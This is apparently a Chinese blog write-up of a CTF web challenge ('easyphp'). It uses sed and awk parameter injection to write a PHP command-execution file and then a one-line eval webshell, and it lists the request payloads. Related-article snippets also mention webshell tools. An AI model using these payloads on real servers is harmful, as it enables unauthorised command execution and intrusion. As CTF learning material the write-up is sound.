web单身杯之easyphp

最新推荐文章于 2024-11-14 20:57:19 发布

N1_WEB

最新推荐文章于 2024-11-14 20:57:19 发布

阅读量154

点赞数

分类专栏： CTF学习笔记文章标签： linux 运维服务器

本文链接：https://blog.csdn.net/NYG694/article/details/132193164

版权

CTF学习笔记专栏收录该内容

21 篇文章 0 订阅

订阅专栏

1.sed 方法

在liunx中除了普通的cat还有sed，

sed 的基本使用【详图】_sed使用_你有些许优秀的博客-CSDN博客

这里面我们的目标其实是从中选取几行代码绕过给出的函数创建新文件，

1.<?php

2.$cmd = $_POST['cmd'];

3. shell_exec($cmd);

组成

<?php

$cmd = $_POST['cmd'];

 shell_exec($cmd);

这样一个文件，我们就可以通过传参随意浏览执行命令。

这里要使用正则表达式的匹配

首先在原文件中传参

cmd=sed

然后

param=/php\|POST\|exex/w 1.php

\是转义所以\|，

这样子1.php就生成了，我们再访问当前地址1.php，然后进行传参cmd=echo "<?php eval(\$_POST['cmd']);?>">2.php

访问2.php,用cmd=system('ls /')就可以读取了

本来我想问什么已经可以控制cmd，就可以直接读取文件了，但是并不行，必须要写入木马获得webshell才能执行。

2.awk方法

还可以使用awk，

可以直接执行命令，但因为界面没有回显所以

cmd=awk&param={system("ls />a")}

将读取的文件写入a，然后读取a就可以下载。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

N1_WEB

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF[羊城杯2020]easyphp

snowlyzz的博客

08-21

826

刷题记录

php如何用菜刀连接getshell,菜刀(代码执行)函数和命令执行函数详解及Getshell方法...

weixin_29730445的博客

03-16

939

@$temp = $_FILES['upload_file']['tmp_name'];@$file = basename($_FILES['upload_file']['name']);if (empty ($file)){echo "\n";echo "Local file: \n";echo "\n";echo "\n\n\n";}else {if(move_uploaded_file($t...

1 条评论您还未登录，请先登录后发表或查看评论

单身杯web wp

GSflyy的博客

07-25

819

若无闲事挂心头，便是人间好时节

单身杯，Web：web签到

Pai_Space

07-15

838

单身杯，Web：web签到

PHP-代码执行函数-命令执行函数

weixin_47112073的博客

10-21

6523

简单写一下代码执行函数与命令执行函数有哪些，并且说说他们的不同

细说——命令执行_代码执行

LainWith的博客

10-11

3519

目录原理命令执行漏洞原理代码执行漏洞原理命令执行与代码执行漏洞区别命令执行&代码执行漏洞危害命令执行无回显代码执行函数1- eval()2- assert()-最好不要加上分号作为结尾3- call_user_func()4- create_function()5- array_map()6- call_user_func_array()7- array_filter()8- uasort()函数9- preg_replace()命令执行函数1- system()2-passthru()3- exe

linux php,php中如何执行linux命令详解

weixin_39888943的博客

03-09

301

前言本文主要给大家介绍了关于在php中如何执行linux命令的相关内容，下面话不多说了，来一起看看详细的介绍吧php如何执行某个命令，官方手册在这里我们先从shell_exec来说如何使用shell_exec在php里面执行shell命令先来试一下，使用php执行某个shell命令，该命令是mkdir testdir。$cmd = 'mkdir testdir';shell_exec($cmd)...

EasyPHP Devserver & Webserver-开源

04-18

EasyPHP Devserver和Webserver使用Devserver和Webserver进行主机开发PHP，Apache，MySQL，Nginx，PhpMyAdmin，Xdebug，PostgreSQL，MongoDB，Python，Ruby ...适用于Windows。 Devserver将安装一个完整且可立即使用...

EasyPHP

07-22

资源名称：EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西，集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片：资源太大，传百度网盘了...

EasyPHP-3.0-setup.rar_EasyPHP-3.0-setup_EasyPHP-3.1_Easyphp3.0_e

09-14

5. 将PHP项目文件放入默认的Web根目录（通常是`C:\Program Files\EasyPHP\www`），然后可以通过浏览器访问这些项目。 6. 使用内置的管理工具（如phpMyAdmin）来管理MySQL数据库。 EasyPHP-3.0作为一款早期的PHP开发...

easyphp5.4.6

02-08

EasyPHP是一款针对Windows平台设计的集成开发环境，它包含了PHP、Apache和MySQL这三大Web开发核心技术，使得开发者能够在本地环境中快速搭建起一个功能完备的Web服务环境，进行PHP应用程序的开发和测试工作。...

WEB:easyphp

sleepywin的博客

07-25

540

array_search()没有设置strict参数（如果该参数被设置为 TRUE，则函数在数组中搜索数据类型和值都一致的元素），我们就可以用。array_search保证非0下标元素含0就行，字符串转数字都是0。，0 == 'DGGJ'又0===='DGGJ'为false。绕过is_array和array_search函数。可以使用%00绕过is_numeric函数。编写MD5碰撞脚本得到b=53724。可用科学计数法绕过 a=1e9。要绕过is_numeric函数。或构造payload。

PHP中常见的命令执行函数与代码执行函数

热门推荐

→_→

10-22

1万+

参考： https://blog.csdn.net/weixin_43376075/article/details/105189017 https://blog.csdn.net/qq_43168364/article/details/105595532 https://www.cnblogs.com/-qing-/p/10819069.html 代码执行函数： 1- eval() #传入的参数必须为PHP代码，既需要以分号结尾。 #命令執行：cmd=system(whoami); #菜.

php assert执行命令,php中代码执行&&命令执行函数

weixin_33603963的博客

03-19

2406

一、PHP代码执行函数1、eval()函数#传入的参数必须为PHP代码，既需要以分号结尾。#命令執行：cmd=system(whoami);#菜刀连接密码：cmd那么当我们上传了eval函数的菜刀马之后，在连接不上菜刀的情况下怎么上传大马呢？继续往下看这里我是先写一个上传马，再用上传马去上传大马，有点多次一举，但是考虑到大马代码量太多，还是建议先写个上传马，以下代码只有1kb。@$temp = $...

ctfshow单身杯

Landasika的博客

05-25

1426

ctfshow单身杯 web1. web签到题目代码如下： <?php # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-03-19 12:10:55 # @Last Modified by: h1xa # @Last Modified time: 2022-03-19 13:27:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com error_reporting(0);

ctfshow单身杯(dsb)个人wp

weixin_49436541的博客

05-23

1151

目录MISC签到没大没小的串串 MISC签到没大没小的串串爆 import hashlib import random def huan(zm): if ord(zm)>=65 and ord(zm)<=90: return zm.lower() if ord(zm)>=97 and ord(zm)<=122: return zm.upper() return zm flag="y0U_RE4lLy_kn0W_TH1S_Co

[ctfshow 单身杯]web writeup&&学习一下sed awk基本用法

weixin_45751765的博客

06-08

1395

想起来之前比赛撞了单身杯没打完刚好来复现一下 data伪协议直接过 ?>截断就行poc 远程包含用?参数包含也可三字长度命令参数长度任意保证传入字符串参考 sed教程流程：sed工作流程 sed不用任何语句时可以直接输出源文件内容本着需要什么学什么的初心我们直接看payload来学习 sed支持正则匹配 /esca/匹配到 escape行 d 将其删除 sed语句用；间隔开 s字符串替换 shell_exec -> system g为全局替换标志w 写入 -->可以看作cp的功能版将

Linux编辑/etc/fstab文件不当，不使用快照；进入救援模式